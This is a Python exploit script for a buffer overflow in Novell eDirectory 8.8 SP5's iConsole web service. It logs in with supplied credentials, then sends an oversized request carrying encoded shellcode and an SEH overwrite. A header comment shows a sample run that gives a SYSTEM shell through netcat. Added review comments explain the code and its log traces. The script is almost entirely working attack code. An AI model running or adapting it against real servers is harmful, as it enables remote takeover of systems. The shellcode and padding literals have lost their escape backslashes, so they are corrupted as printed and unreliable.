
# Title : Novell eDirectory 8.8 SP5 iConsole Buffer Overflow
# Published : 2009-11-16
# Author : Matteo Memelli


#!/usr/bin/python
# Novell eDirectory 8.8 SP5 iConsole BOF
# Vulnerability found by Hellcode Labs, 
# Original POC http://downloads.securityfocus.com/vulnerabilities/exploits/36815.pl
# 
# Exploit coded by Matteo Memelli | ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 04/11/2009 
#
# Process dhost.exe becomes unstable after pwnage, so we need to connect quickly to save our shell ;)
#
# root@bt:~# ./gotohell.py 172.16.30.201;nc -v 172.16.30.201 4444
# 302 Found
# DHAC1=c8280012; Path=/
# 172.16.30.201: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.201] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# 
# C:\Novell\NDS\DIBFiles>whoami
# whoami
# nt authority\system
# 
# C:\Novell\NDS\DIBFiles>
 

import sys
import httplib, urllib

# Target host is taken from the first command-line argument (see the sample
# invocation in the header comment).
try:
   HOST = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   # NOTE(review): the script does not exit here, so HOST stays unbound and
   # the do_auth() call at the bottom of the file fails with NameError.

def do_auth(usr, pwd):
   """Log in to the iConsole login endpoint and return the session cookie.

   Sends a form-encoded POST to /_LOGIN_SERVER_RSP_ on HOST:8030 over HTTPS,
   prints the HTTP status line, and prints and returns the header value the
   script treats as the cookie.

   Args:
      usr: iConsole username (the module-level value is a placeholder the
         user is told to replace).
      pwd: password for that user.

   Returns:
      The value of the second response header, which the author takes to be
      the session cookie (``DHAC1=...; Path=/`` in the sample run above).
   """
   params = urllib.urlencode({'usr': usr, 'pwd': pwd, 'button': 'Login'})
   headers = {"Content-type": "application/x-www-form-urlencoded",
              "Accept": "text/plain"}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   conn.request("POST", "/_LOGIN_SERVER_RSP_", params, headers)
   response = conn.getresponse()
   # Positional lookup: assumes the cookie is always the second header the
   # server returns. There is no lookup by header name and no status check,
   # so a failed login would presumably still return whatever sits at that
   # index.
   cookie=response.getheaders()[1][1]
   print response.status, response.reason
   # Body is drained but never used.
   data = response.read()
   conn.close()
   print cookie
   return cookie

def do_pwn(evil, cookie):
   """Send the oversized ``L:`` query value to /dhost/modules with the cookie.

   Args:
      evil: the attack string assembled at module level.
      cookie: value returned by do_auth(), sent verbatim in the Cookie header.

   Returns:
      None. The response is never read and the connection is never closed;
      the header comment says dhost.exe is expected to become unstable after
      this request.
   """
   headers = {"Host": "%s:8030" % HOST,
              "Cookie": "%s" % cookie}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   # The payload is concatenated straight into the request line without any
   # URL encoding. From a detection standpoint this is a single authenticated
   # GET to /dhost/modules whose query string is well over a kilobyte of
   # repeated filler bytes.
   conn.request("GET", "/dhost/modules?L:"+evil, None, headers)

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# NOTE(review): the backslashes of the `\xNN` escapes appear to have been
# stripped when this page was extracted ("xebx03..."), so as printed these
# literals are plain ASCII text and not the 709-byte encoded payload the line
# above describes. They are left exactly as found.
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx48"
"x4ex36x46x52x46x42x4bx58x45x54x4ex43x4bx38x4ex37"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x55x46x42x4ax32x45x47x45x4ex4bx58"
"x4fx55x46x42x41x30x4bx4ex48x36x4bx48x4ex50x4bx34"
"x4bx48x4fx45x4ex31x41x50x4bx4ex43x30x4ex52x4bx38"
"x49x58x4ex36x46x42x4ex41x41x36x43x4cx41x43x4bx4d"
"x46x56x4bx48x43x44x42x53x4bx58x42x44x4ex30x4bx48"
"x42x47x4ex41x4dx4ax4bx48x42x34x4ax30x50x35x4ax56"
"x50x48x50x54x50x50x4ex4ex42x35x4fx4fx48x4dx48x46"
"x43x55x48x56x4ax46x43x53x44x33x4ax36x47x37x43x57"
"x44x33x4fx35x46x55x4fx4fx42x4dx4ax36x4bx4cx4dx4e"
"x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x58x4dx4ex4ax50x44x30x45x35x4cx46x44x50"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
"x4fx4fx48x4dx43x45x43x35x43x45x43x55x43x45x43x34"
"x43x45x43x44x43x35x4fx4fx42x4dx48x56x4ax36x41x31"
"x4ex35x48x46x43x45x49x48x41x4ex45x59x4ax46x46x4a"
"x4cx41x42x37x47x4cx47x55x4fx4fx48x4dx4cx36x42x41"
"x41x45x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d"
"x4ax56x45x4ex49x44x48x38x49x54x47x55x4fx4fx48x4d"
"x42x55x46x45x46x45x45x45x4fx4fx42x4dx43x49x4ax46"
"x47x4ex49x57x48x4cx49x57x47x55x4fx4fx48x4dx45x55"
"x4fx4fx42x4dx48x56x4cx46x46x36x48x36x4ax56x43x36"
"x4dx46x49x58x45x4ex4cx56x42x45x49x45x49x32x4ex4c"
"x49x48x47x4ex4cx56x46x34x49x48x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x54x4ex52"
"x43x39x4dx58x4cx57x4ax43x4bx4ax4bx4ax4bx4ax4ax46"
"x44x37x50x4fx43x4bx48x41x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x35x41x35x41x45x4cx56"
"x41x30x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x45x4fx4fx48x4dx4cx46"
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx48x47x55x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax56x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

## PUT YOUR CREDENTIALS HERE ##
# Valid iConsole credentials are required: do_auth() runs before do_pwn(), so
# this is a post-authentication issue, and the login POST to HOST:8030 is the
# first thing a server-side log will show before the oversized request.
usr = ".Admin.O=offsec.OFFSEC."
pwd = "admin"
###############################
# Components of the attack string. As with the shellcode literal above, the
# backslashes of the `\xNN` escapes appear stripped on this page, so the
# printed strings are ASCII text and their lengths and values differ from
# what the author intended; they are left as found.
j1  = "xEBx06x90x90"
j2  = "xE9x26xFDxFFxFF"
n1  = "x90"*8        # intended as 0x90 (x86 NOP) padding
n2  = "x90"*4
p1  = "x41"*947      # 947 bytes of filler ahead of the payload
p2  = "x42"*221      # trailing filler
# Per the author's note, the address below lies in nmasldap.dll, a module
# built without SafeSEH; that module is the hardening gap that makes the
# handler overwrite usable, independent of the overflow itself.
ret = "x6Ax38x81x64" # 0x6481386A nmasldap.dll SafeSEH unprotected
evil = p1 + n1 + shellcode + j1 + ret + n2 + j2 + p2
# sweet biscuit...
cookie = do_auth(usr, pwd)
# sh...
do_pwn(evil, cookie)